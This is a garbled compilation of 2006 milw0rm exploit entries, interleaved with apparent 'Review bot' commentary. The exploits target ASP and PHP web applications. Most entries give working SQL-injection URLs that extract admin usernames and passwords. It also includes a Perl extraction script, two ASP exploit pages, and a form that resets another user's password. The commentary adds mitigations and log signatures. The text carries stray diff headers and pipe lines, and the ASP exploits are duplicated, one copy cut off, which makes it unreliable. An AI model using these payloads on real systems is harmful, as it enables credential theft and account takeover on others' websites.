################################################################
|
||||
|
||||
# milw0rm.com [2006-09-05]
|
||||
|
|
|
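Review bot: the entry records only the injection point, the `RepId` parameter of `ReplyNew.asp`, and no mitigation or detection information, which is what a defender consulting the archive needs most. The `RepId=-1` prefix shows the value is used as a numeric record id, so the application-side fix to note is casting the parameter to an integer (or binding it as a query parameter) before it reaches the `SELECT`, and the request-log signature is a negative `RepId` followed by `UNION SELECT` against `ReplyNew.asp`; the `theadmin/default.asp` path in the last block is also worth listing as a location to restrict, since the entry presents it as the target of the recovered credentials.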
@ -1,13 +1,13 @@
# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp

exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1

uyeno = 1 or 2( Admin ID )

# milw0rm.com [2006-09-13]

@ -1,21 +1,21 @@
Vulnerability Report
*******************************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability

# Author : ajann

# Script Page : http://quadcomm.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]

Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

# ajann,Turkey
# ...

# milw0rm.com [2006-09-17]

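Review bot: the injection point here is `OrderBy`, not an id, and that changes the fix the entry should point to: a sort column cannot be passed as a bound query parameter, so the only sound mitigation is an allowlist of permitted column names (or ordinal positions) checked before the value is spliced into the SQL, with anything else rejected. The example also shows `ManuID=` submitted empty in both the template and the payload, so the entry does not establish whether that parameter is handled safely; that gap should be noted rather than left implicit.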
@ -1,28 +1,28 @@
*******************************************************************************
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability

# Author : ajann

# Dork : faqview.asp?key

# Script Page : http://www.t-dreams.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/faqview.asp?key=[SQL HERE]

Example:

//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin

With admin username and password take it,after join to login page:
../[path]/admin/

# ajann,Turkey
# ...
# Im not Hacker!

# milw0rm.com [2006-09-17]

@ -1,23 +1,23 @@
*******************************************************************************
# Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability

# Author : ajann

# Script Page : http://www.t-dreams.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]

Example:
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18

Pls UserID Change(1,2,3,4,5.....)

# ajann,Turkey
# ...
# Im not [Turkish]Hacker!

# milw0rm.com [2006-09-17]

@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In : uye_profil.asp
+ Risk : High


+ Exp.

http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2

# milw0rm.com [2006-09-19]

@ -1,11 +1,11 @@
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability

# Author : Muhacir

# Source : http://www.aspindir.com/goster/4386

# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler

# Greetz To : str0ke :)

# milw0rm.com [2006-09-22]

@ -1,46 +1,46 @@
#!usr/bin/perl

#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186

use LWP::Simple;

print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";

if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{
print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n";
print "Example : perl $0 http://site.org/blog/ nick\n";
exit(0);
}
else
{
if($ARGV[1] eq 'nick'){
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1); }
else {
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve password\n" if(!$1);
}
}

#To Be Or Not To Be!

# milw0rm.com [2006-09-24]

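Review bot: the argument check on the `if(...)` line does not test what it intends: `!$ARGV[0]=~/http/` parses as `(!$ARGV[0]) =~ /http/`, which matches the negated boolean (an empty string or `1`) against `/http/` and is therefore never true, so the `http` clause is dead and the usage message is printed only for a missing argument; the Perl idiom for the intended test is `$ARGV[0] !~ /http/`. Separately, the `$url` and `$code` payloads are the whole request-log signature a defender needs for this one: a negative `pid` on `proje_goster.asp` followed by `union select ... from uyeler`, and the `MD5 hash of password` banner records that the `sifre` column holds unsalted-looking MD5 digests, which is a reason to force resets on any affected install rather than rely on the hashing.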
@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Download & Info: http://www.aspindir.com/Goster/2981
Bug In : uye_ayrinti.asp
Risk : High

Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1

Password encrytped with SHA-256

# milw0rm.com [2006-09-24]

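Review bot: `Password encrytped with SHA-256` is misspelled and uses the wrong term: SHA-256 is a hash, not encryption, so the `sifre` column the payload selects from `iyzi_uyeler` holds digests rather than ciphertext, and the line says nothing about salting. That distinction matters on the defensive side, because a fast unsalted digest gives no protection against offline guessing once the table has been read; the mitigation for an affected install is to fix the `uye_nu` parameter handling (integer cast or parameter binding on `uye_ayrinti.asp`) and force a password reset, not to rely on the hash.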
@ -1,38 +1,38 @@
<!--
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
# Author : ajann
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)

[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
<font color="#FF0000" face="Verdana" size="2">Email: </font></b>
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>
<input type="text" name="Passe" size="30" value="123456"> <br>
<input type="submit" value="Submit" name="Envoyer">
<input type="reset" value="Cancel" name="Effacer">
<input type="hidden" name="Id" value="42">
<input type="hidden" name="Nom" value="Administrateur"></p>
</form>
</body>
</html>

<!--
[/Code]]]

Change: <input type="hidden" name="Id" value="42"> => ID
Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName

Next to admin.asp

#ajann,Turkey
#...

#Im Not Hacker!
-->

# milw0rm.com [2006-10-18]

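Review bot: the weakness this form demonstrates is a missing authorization check, not an injection, and the entry's title (`Remote User Pass Change`) should say so for indexing: `doprofiledit.asp` takes the account to modify from the client-supplied hidden `Id` and `Nom` fields (`Change: ... => ID`, `=> UsrName`) and writes whatever `Passe` is posted, so the server trusts the submitter's identity claim. The application-side fix is to take the account from the server-side session and ignore posted `Id`/`Nom`, require the current password before changing it, and, since nothing in the form suggests an anti-forgery token, add a per-session CSRF token to profile edits. `[Code]]]` and `[/Code]]]` inside the HTML comments are leftover forum-markup tags from where the file was first posted, not part of the exploit.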
@ -1,189 +1,189 @@
|
|||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
|
||||
'===============================================================================================
|
||||
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'===============================================================================================
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum <=</b>v1.4(index.php) <u><b>
|
||||
Blind SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit1.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string1="/index.php?consult=1&indMemo="
|
||||
string2="-1%20union select%20"
|
||||
string3="mdp%20"
|
||||
string4="from%20"
|
||||
string5="membre%20"
|
||||
string6="where%20"
|
||||
string7="ind like%20"
|
||||
string8=Request.Form("id")
|
||||
string9="/index.php?consult=1&indMemo="
|
||||
string10="-1%20union select%20"
|
||||
string11="nom%20"
|
||||
string12="from%20"
|
||||
string13="membre%20"
|
||||
string14="where%20"
|
||||
string15="ind like%20"
|
||||
string16=Request.Form("id")
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit1.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
|
||||
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "GET" , come, FALSE
|
||||
.sEnd
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
get_password = take(target2)
|
||||
|
||||
getdata=InStr(get_username,"""720"" valign=""top"">" )
|
||||
username=Mid(get_username,getdata+19,20)
|
||||
passwd=Mid(get_password,getdata+19,20)
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">User Name:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial"> User Password:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-10-24]
|
||||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
|
||||
'===============================================================================================
|
||||
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'===============================================================================================
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum <=</b>v1.4(index.php) <u><b>
|
||||
Blind SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit1.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string1="/index.php?consult=1&indMemo="
|
||||
string2="-1%20union select%20"
|
||||
string3="mdp%20"
|
||||
string4="from%20"
|
||||
string5="membre%20"
|
||||
string6="where%20"
|
||||
string7="ind like%20"
|
||||
string8=Request.Form("id")
|
||||
string9="/index.php?consult=1&indMemo="
|
||||
string10="-1%20union select%20"
|
||||
string11="nom%20"
|
||||
string12="from%20"
|
||||
string13="membre%20"
|
||||
string14="where%20"
|
||||
string15="ind like%20"
|
||||
string16=Request.Form("id")
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit1.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata2")

Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")

Else
%>

<%

target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16

Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function

get_username = take(target1)
get_password = take(target2)

getdata=InStr(get_username,"""720"" valign=""top"">" )
username=Mid(get_username,getdata+19,20)
passwd=Mid(get_password,getdata+19,20)

%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<b><font size="2" face="Arial"> User Password:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>

</table>

<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>

</center>

<script language="JavaScript">
write()
functionControl1()
</script>

</body>
</html>

<%
End If
End If
End If
End If
Set objtake = Nothing
%>

# milw0rm.com [2006-10-24]
|
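Review bot: `Set objtake = Nothing` after the last `End If` is dead code; `objtake` is created and released inside `Public Function take`, so the outer statement names a variable that was never set at page scope and should be dropped. The values scraped into `username` and `passwd` are written back with `<%=username%>`, `<%=passwd%>` and into the hidden `field1` value attribute with no `Server.HTMLEncode`, so whatever the remote page returns is rendered verbatim in the operator's own browser; the same applies to `.sEnd` and `.Responsetext`, which only work because late-bound COM calls are case-insensitive and would read better as `.Send` and `.ResponseText`.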
@ -1,179 +1,179 @@
|
|||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
'===============================================================================================
|
||||
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit2.asp
|
||||
|
||||
'[Note : exploit file name =>exploit2.asp
|
||||
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'===============================================================================================
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
|
||||
Remote SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit2.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string2="/consult/classement.php?champ='"
|
||||
string3="%20union%20select%200,0,concat(char(85),char(115),"
|
||||
string4="char(101),char(114),char(73),char(68),char(58),"
|
||||
string5="id,char(32),char(65),char(100),char(109)"
|
||||
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
|
||||
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
|
||||
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
|
||||
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
|
||||
string10="%20from%20phpl_membres%20where"
|
||||
string11="%20id%20like%20"
|
||||
string12=Request.Form("id")
|
||||
string13="/*"
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit2.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit2.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit2.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "GET" , come, FALSE
|
||||
.sEnd
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
|
||||
getdata=InStr(get_username,"0 0/" )
|
||||
username=Mid(get_username,getdata+5,90)
|
||||
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">Data:</font></b></td>
|
||||
<td width="80%">
|
||||
<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=username%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-10-27]
|
||||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
'===============================================================================================
|
||||
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit2.asp
|
||||
|
||||
'[Note : exploit file name =>exploit2.asp
|
||||
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'===============================================================================================
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
|
